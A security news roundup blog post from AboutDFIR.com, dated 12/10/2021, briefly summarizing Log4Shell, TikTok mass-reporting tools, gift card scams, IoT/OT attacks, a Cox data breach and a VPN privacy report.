AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 12/10/2021

‘I need my girlfriend off TikTok’: How hackers game abuse-reporting systems

One hundred and forty-seven dollar signs fill the opening lines of the computer program. Rendered in an icy blue against a matte black background, each “$” has been carefully placed so that, all together, they spell out a name: “H4xton.” It’s a signature of sorts, and not a subtle one. Actual code doesn’t show up until a third of the way down the screen. The purpose of that code: to send a surge of content violation reports to the moderators of the wildly popular short-form video app TikTok, with the intent of getting videos removed and their creators banned. It’s a practice called “mass reporting,” and for would-be TikTok celebrities, it’s the sort of thing that keeps you up at night.


Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package

A few hours ago, a 0-day exploit in the popular Java logging library log4j was discovered that results in Remote Code Execution (RCE) by logging a certain string. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short (CVE-2021-44228 just isn’t as memorable). The 0-day was tweeted along with a POC posted on GitHub. This has been published as CVE-2021-44228 now.


Scammers are tricking more people into buying gift cards

According to the newest Data Spotlight, 40,000 people reported losing a whopping $148 million in gift cards to scammers during the first nine months of 2021. Those are staggering numbers which have increased each year for the past several years. Since 2018, gift cards have been the most frequently reported payment method for fraud. But which gift card brand do scammers ask people to buy, and lose the most money on? Google Play, Apple, eBay, and Walmart cards remain popular with scammers. But this year, Target gift cards are scammers’ top choice. Most gift card scams start with a phone call from someone impersonating a branch of the government like the Social Security Administration, or a business. The caller might threaten to freeze your bank account and tell you that you must buy gift cards to avoid arrest or to keep access to your money in your bank account. They will tell you to stay on the phone as you head to the store to buy gift cards to, they often claim, solve the “problem” they are calling about. They will also ask you to provide the numbers on the back of the card you buy. These are all signs of a gift card scam.


Volume of Attacks on IoT/OT Devices Increasing

The volume of attacks on IoT and OT devices is increasing and in many cases these systems were specifically targeted by threat actors, according to a new study commissioned by Microsoft. Forty-four percent of the more than 600 respondents who took part in a survey said their organization experienced a cyber incident that involved an IoT or OT device in the past two years. Thirty-nine percent said such a device was the target of the attack and 35% said the device was leveraged to conduct a broader attack — this includes lateral movement, detection evasion and persistence. IoT and OT devices may be specifically targeted by attackers with the intent to cause disruption. One example provided by Microsoft involves human-operated ransomware attacks that disrupt production in an organization.


Cox discloses data breach after hacker impersonates support agent

Cox Communications has disclosed a data breach after a hacker impersonated a support agent to gain access to customers’ personal information. Cox Communications, aka Cox Cable, is a digital cable provider and telecommunication company that provides internet, television, and phone services in the USA. This week, customers began receiving letters in the mail disclosing that Cox Communications learned on October 11th, 2021, that “unknown person(s)” impersonated a Cox support agent to access customer information. There are not a lot of details about the security incident, but the hacker likely used a social engineering attack to gain access to Cox internal systems that provided information about customers. “On October 11, 2021, Cox learned that an unknown person(s) had impersonated a Cox agent and gained access to a small number of customer accounts. We immediately launched an internal investigation, took steps to secure the affected customer accounts, and notified law enforcement of the incident,” reads the data breach notification signed from Amber Hall, Chief Compliance and Privacy Officer of Cox Communications.


A New Report on VPNs Shows They’re Often a Mixed Bag for Privacy

By now, you’ve likely heard that virtual private networks protect your privacy. You’ve probably also heard that they don’t actually do that. Who to believe? VPNs are often sold as a way to obscure your web activity from the world because they route your internet traffic through private servers. They’ve been a part of online privacy culture since pretty much the advent of the internet. And yet, for equally as long, they’ve also been a source of contention, with ongoing questions into their efficacy and trustworthiness. Here to add to that debate is Consumer Reports, which recently published a 48-page white paper on VPNs that looks into the privacy and security policies of 16 prominent VPN providers. Researchers initially looked into some 51 different companies but ultimately honed in on the most prominent, high-quality providers. The results are decidedly mixed, with the report highlighting a lot of the long offered criticisms of the industry—namely, it’s lack of transparency, its PR bullshit, and its not always stellar security practices. On the flip side, a small coterie of VPNs actually seem pretty good.

Related Posts